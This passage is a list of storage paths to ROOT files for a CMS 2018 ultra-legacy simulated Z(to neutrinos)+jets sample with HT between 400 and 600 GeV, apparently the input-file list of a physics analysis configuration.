'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/93894D11-91D7-8A4B-89DA-0DA5AC024109.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9C5D6912-BB4A-9847-A3A1-1053B6EDF67A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9C93C234-421C-444E-8465-068B548F9652.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9CFE932E-58D0-D046-BE91-8FF941278909.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/9E9F8B71-1576-AB48-B729-FA911D410474.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A03ECAFF-663A-6C43-A150-3A9D375C9283.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A25B37FF-D52B-0A4E-A4C0-398291AF9AFF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A50B4C8B-E5CF-2B48-B6DF-D177C6B1EA9D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/A76713A6-2E9A-C44E-A4AC-9FEDEA6E7E86.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B2C43670-11EB-B141-9C05-D240812234DE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B313590B-EBA6-0A4F-88EA-E1F853507331.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B56BDFBE-8653-D548-A011-A9D162C143B9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B61F9C08-AC52-1B4A-A2D0-49E4F8ECF791.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/B7E478F8-A3AA-1941-8377-AFF00ABA84F4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/BC0181F1-6613-A346-9184-2C9B57992CB0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/BCDC363F-B093-5B43-B923-D69AAE220340.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/C2254CB6-37FE-E34B-BCC0-67A1A68B17D7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/C7784292-1C17-8C4A-9DF4-F0AACBA746FD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/CBA8082C-6E2B-9D4E-8B09-DDEE91702E7D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/CBD9D58F-73E7-7A44-BFDD-136692899BFA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/CF511BAA-ADDC-9148-A192-51CD44443E04.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/D1E5C7E6-0374-BA4C-AF79-9EE58AAE5DFB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/D914AF19-2FDA-9F40-B1DF-12084ADFD6BF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/D944E231-B179-3445-8C1B-1ED18D99A51F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/DE8527B5-9829-4440-9971-4002EE2F04C3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/E3ABB170-59DE-A349-821B-C55820D215D0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/E6AD6204-7ED2-4F46-BBCF-C49D5553241D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/E7DF61FF-2D2B-414D-87DC-FE90DE0996DA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/F1DB09B4-4B49-BA4A-BD2F-95D0480EB4C8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/F24DD105-F540-6D49-B7EB-934B445ED02B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/F2CD6353-D4C5-644E-8D98-C57140593E34.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/FBC3A5BB-0970-934A-9767-B8AEF7EB96EA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/FCA27572-EE13-294B-95DB-70430497C449.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/130000/FF9E25A8-A396-0241-98A9-8B1B658FB399.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0C4F2C97-1D83-3E4B-9E2E-B1B31A6FB565.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0E71367A-8E6A-3540-9A43-2BC68BB51D4F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0E7E0FBE-C39A-1349-82D7-2627C10672B0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/0F5DE692-B5C0-ED43-A81A-379B82AC7977.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/1C312DFE-0AB9-7046-B308-D08590669885.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/1D38AF48-2532-214C-A7A0-2C4E8439FBA6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/1DE9BFBF-5161-2046-988E-04FFD950B70C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/23D075B5-010B-0944-9FF1-7BDCACF24826.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/2795EA75-A07F-274D-8506-850FBDC9EB57.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/31A0E971-A3BD-DB4E-AC2A-D5B071D7F879.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/34BA6E70-370F-594C-9EF0-F9AD00F6BC3D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/393AF089-BFEA-484C-ABA1-D33972F5B5E1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/394B0CF2-E1DE-E24B-B6E7-F80C6960D939.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/3B3D546D-E33D-EA4C-913A-017CEF96CD00.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/41997A52-64D7-4745-95C0-C446922874BC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/4BAD0335-F4EE-D644-8FED-74D5F8EFD75B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/4E8999BF-37FF-874B-96B5-70F4E0B382A6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/512C9AE5-9078-2F4E-9926-EA1F7E45C16D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/51A7CB76-1FFB-EA42-A635-245CC1E81324.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/593D5659-4844-F442-AD36-2F10DA27D087.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/5BE74E9F-1F97-9B4B-9DA0-F8514E664749.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/6468759F-F6BD-6743-91ED-969EF3945F87.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/688F0438-EBF9-8344-938B-7B1335F8D59F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/69D51251-9ED8-D347-B72C-E8D750FC7A6B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/70BEDD19-622C-2B4B-9D22-B3B08DA93E0A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/71398763-343D-EE40-A694-CFC178AFAC97.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/71F98765-7E1A-3440-89E7-A91EA0148E0A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/7434363D-50FC-2B4C-AB96-F21963DE1E4E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/75920CA6-4B92-B44A-B863-74B76A286289.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/79294D7C-E575-2544-825D-924C886E88D4.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/79DC0C7B-4896-BD4D-8BD8-91EE878D62CF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/7BE83BB1-6EF3-774E-A8B9-F0150BF8AA6D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/8914A8D6-0796-3D43-B05C-EE4AAF81F68F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/8A94200B-C0AC-294E-8084-D11A13BE79CE.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/8FEEC1B8-D546-984F-8216-2C1DBF7BB5C5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/9100725F-0AEA-8540-A182-218411CF1230.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/9D371EC5-8FB1-6C40-854B-583C1E0C9648.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A181E602-4342-4740-9D8E-0366607F00C0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A315B281-65AE-DA45-A6FE-DAA1680C4657.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A8DA9CE8-B014-1444-8297-DE3FCC0F166B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/A9E5249D-1B05-DE45-AAF1-47898BC1B63C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/AE8EE6DC-1E20-5C4B-B51F-D0AEB249E11A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/BDE4B218-E1F2-CA40-9A28-6512D66B4D16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/BFFC2526-47D5-E242-B2CB-A09034672062.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C00FC51D-9447-834B-BDC3-96F5FE24A61A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C180F591-1BD6-B941-A1D8-D44A17FDC347.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C1FA7C8B-5D15-344A-82DE-9BC30EF30DF1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/C2E1CD6A-1882-4F49-BEEF-437969309E3C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/CA2EAFB4-AF05-1B4C-853F-2BFC4DB5855B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/CC6F26B4-3752-0242-BCD1-62A66B537642.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/D1398B3E-F697-F748-BE90-AFC4D6B63F82.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/E3282A7D-9204-D34A-84E6-11E9757DD26E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/F48AB845-AF8B-7341-967C-BB59F3B0553C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/270000/F787D077-B36D-1C4E-80D7-472C2CFB0EAF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00292BC3-D291-4D41-8274-0E83F4A14B81.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00459626-7FF2-C44D-A77B-B1F13FCD0B16.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00BDED3B-8FA4-D542-BD0E-6DE95B03E843.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/00D29CF5-D763-7E48-A31E-E517BC6CFDE5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/01044271-ED92-FE4B-99ED-1E4D77E447E7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/026D70C6-FB5A-C84F-A047-9F53D3242D00.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/036D66DB-C20B-7440-9A49-5E258CB7CAE1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/072EF151-32A7-FF4B-8E0C-D1BB38D0B598.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0769AA29-D9AF-3E4F-8D13-5FCA2447B9A8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/09004E0F-2CE5-D044-AA9C-35C5D4251838.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0984131D-854D-BF47-ADA9-B99DFDA0C579.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/09AC3698-5E92-CD43-A27B-489AF42BAE76.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/09E625E9-0F13-9C48-B2CA-5DB799F3D3A7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0AE66993-9E07-064F-AA0B-56DD6A9A8F7C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0B083FC8-8F29-6D4A-B2BF-437CA351999B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0D5B95A9-2136-FA4A-A198-72A51E68BEE1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0D6A0DB0-EB21-BB4C-A8FA-F7FFD55A04E2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0D84CE67-EB66-AB47-B47C-160D74DF8C77.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0DE6F1A5-0EEE-9447-87FB-6C8F7AF9C9C7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0E353CBD-A6D9-8B43-85D4-22FEF9FEB8E6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0F8D2C15-D04B-CF40-A1A1-5D5F7FA8529C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/0FEB441E-2C29-4E4E-81D1-7AB0B9EF1918.root',
